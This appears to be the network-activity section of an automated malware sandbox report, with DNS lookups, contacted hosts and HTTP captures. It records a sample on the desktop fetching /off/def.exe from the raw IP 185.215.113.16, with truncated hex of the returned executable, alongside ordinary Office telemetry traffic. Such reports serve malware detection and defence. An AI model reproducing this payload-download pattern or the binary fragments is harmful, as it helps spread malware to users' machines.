                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:15.429960966 CET1.1.1.1192.168.2.100xa957No error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:17.355703115 CET1.1.1.1192.168.2.100x393No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:17.355703115 CET1.1.1.1192.168.2.100x393No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:17.356956005 CET1.1.1.1192.168.2.100x40b3No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:17.356956005 CET1.1.1.1192.168.2.100x40b3No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:17.356956005 CET1.1.1.1192.168.2.100x40b3No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:17.356956005 CET1.1.1.1192.168.2.100x40b3No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:17.465311050 CET1.1.1.1192.168.2.100x4170No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:17.691581964 CET1.1.1.1192.168.2.100xa81fNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:17.691581964 CET1.1.1.1192.168.2.100xa81fNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:17.691581964 CET1.1.1.1192.168.2.100xa81fNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:20.426022053 CET1.1.1.1192.168.2.100xdc65No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:20.426022053 CET1.1.1.1192.168.2.100xdc65No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:20.426022053 CET1.1.1.1192.168.2.100xdc65No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:20.695436001 CET1.1.1.1192.168.2.100x54ebNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:20.695436001 CET1.1.1.1192.168.2.100x54ebNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:20.696558952 CET1.1.1.1192.168.2.100x112eNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:20.696558952 CET1.1.1.1192.168.2.100x112eNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:20.696558952 CET1.1.1.1192.168.2.100x112eNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:20.696558952 CET1.1.1.1192.168.2.100x112eNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:20.701179981 CET1.1.1.1192.168.2.100x1d91No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:27.815275908 CET1.1.1.1192.168.2.100xac17No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:28.008409023 CET1.1.1.1192.168.2.100xf935No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:33.188983917 CET1.1.1.1192.168.2.100xba5dNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:33.212152004 CET1.1.1.1192.168.2.100xc9d1No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:39.990878105 CET1.1.1.1192.168.2.100xa7ceNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.097676039 CET1.1.1.1192.168.2.100x3f33No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              • otelrules.azureedge.net
                                                                                                                                                                                                                                                              • steamcommunity.com
                                                                                                                                                                                                                                                              • marshal-zhukov.com
                                                                                                                                                                                                                                                              • slscr.update.microsoft.com
                                                                                                                                                                                                                                                              • https:
                                                                                                                                                                                                                                                                • js.monitor.azure.com
                                                                                                                                                                                                                                                                • wcpstatic.microsoft.com
                                                                                                                                                                                                                                                                • www.bing.com
                                                                                                                                                                                                                                                              • fs.microsoft.com
                                                                                                                                                                                                                                                              • 185.215.113.16
                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              0192.168.2.1049792185.215.113.16808100C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:55.869416952 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Host: 185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.259757042 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:57 GMT
                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                              Content-Length: 2748416
                                                                                                                                                                                                                                                              Last-Modified: Wed, 27 Nov 2024 14:39:23 GMT
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              ETag: "67472f1b-29f000"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2a 00 00 04 00 00 ac 01 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$`* `@ **`Ui` @ @.rsrc`2@.idata 8@zkteabrp)):@oljfpuhd @*)@.taggant@`*")@
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.259819031 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.259830952 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.259954929 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.259965897 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.259979010 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.260238886 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.260255098 CET1236INData Raw: 19 19 7e 45 f1 76 7f 0a 7a 65 7d 82 6a 9b da 34 16 b2 e4 24 d7 50 d1 e4 a5 2b b3 03 40 b0 43 1a d2 9d 29 a9 3b 8e 04 65 22 e6 ba 3a 4b 54 6f 05 87 2c 9f 34 c3 1f 72 00 79 4e 7c fe 88 24 36 17 8b 17 8f 44 f1 22 8b 5c d5 3b 9e fa 66 35 7c 95 b3 fe
                                                                                                                                                                                                                                                              Data Ascii: ~Evze}j4$P+@C);e":KTo,4ryN|$6D"\;f5|)/v{|KA#l rt}J\ng;z"O9}-&pr}:,YHPY+ptWkvF(5w$K!\7V?ciz5kf9
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.260266066 CET1236INData Raw: 05 1a 95 5a 2d 1a 99 26 16 05 1e 3b 70 3d 93 b3 b7 45 8f 3e e9 50 b1 23 a7 a2 b9 4a 8d 5d 89 45 b7 45 c9 24 19 7d cd 47 1e 10 0b c3 8d 1a d5 44 b7 79 95 72 e9 61 e5 38 db b6 ef 7e b5 3d f1 1b e7 3e 29 9f 70 99 82 cc 8d 9d a1 45 f7 2e 09 93 ff d5
                                                                                                                                                                                                                                                              Data Ascii: Z-&;p=E>P#J]EE$}GDyra8~=>)pE.g@257!V|+t~gjK~EM%P}QGUQBpY,a41iC54yE~1~-g5HE%(TuhNL]j{pE;!P!sdOw%|P}1
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.260277987 CET1236INData Raw: ce 37 8e 4b e3 55 95 17 ca 82 45 45 82 01 85 b9 7c 10 97 72 bd 2a b9 eb 71 73 c4 63 dc f5 ea e8 d3 42 c3 75 7b 96 b7 09 08 74 6a 18 97 2f ca db c7 1d e9 54 6d 80 06 67 87 0d f3 66 d8 70 e5 9f ff 2a e1 33 89 74 d9 4d 7e e7 29 46 f5 ca ae 96 3a 03
                                                                                                                                                                                                                                                              Data Ascii: 7KUEE|r*qscBu{tj/Tmgfp*3tM~)F:0e9a5+CUDozx\tU*lo?iEG`w'-:D)'G'j%67n0k!I*R`$9tKSm(yp{j}7`zIDj/
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.380335093 CET1236INData Raw: 75 62 5e ef 9f 31 74 1e 9b b5 7a 09 54 11 b7 25 6b 2a 83 85 6b 31 d5 12 68 47 61 6b 6e 22 60 36 6b 21 db 50 b8 2e 27 d8 ea f6 70 7c cc e0 92 b3 b6 db ed 49 ce 7f 9d 02 b7 0f 87 59 d5 6e e1 50 65 7c df 47 db 70 d6 f3 37 3a 80 d5 27 84 e4 87 d7 f5
                                                                                                                                                                                                                                                              Data Ascii: ub^1tzT%k*k1hGakn"`6k!P.'p|IYnPe|Gp7:'eiz=s"zk*-4;=8/O4< 04!D5"RHqCVox3=s4}Vx,b^oaqdEhA_}[V:C8Po%lVq#L9R<gOQ


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              0192.168.2.104970713.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:20 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:20 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:20 GMT
                                                                                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                                                                                              Content-Length: 218853
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public
                                                                                                                                                                                                                                                              Last-Modified: Mon, 25 Nov 2024 13:17:46 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DD0D538D5EA1E0"
                                                                                                                                                                                                                                                              x-ms-request-id: 074712ec-501e-00a0-4f63-409d9f000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153120Z-174f7845968cdxdrhC1EWRg0en0000000x4g000000005er0
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:20 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                                                                              Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                                                                                              2024-11-27 15:31:20 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                                                                              Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                                                                                                              2024-11-27 15:31:20 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                                                                                                              Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                                                                                                              2024-11-27 15:31:21 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                                                                                                              Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                                                                                                              2024-11-27 15:31:21 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                                                                              Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                                                                                                              2024-11-27 15:31:21 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                                                                                                                              Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                                                                                                              2024-11-27 15:31:21 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                                                                                                                              Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                                                                                                              2024-11-27 15:31:21 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                                                                                                              Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
